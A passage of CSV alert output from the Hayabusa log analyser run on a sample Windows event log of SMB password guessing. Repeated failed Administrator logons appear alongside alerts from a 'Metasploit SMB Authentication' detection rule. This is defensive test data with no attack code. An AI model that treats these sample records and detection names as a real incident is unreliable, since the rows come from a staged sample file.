Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
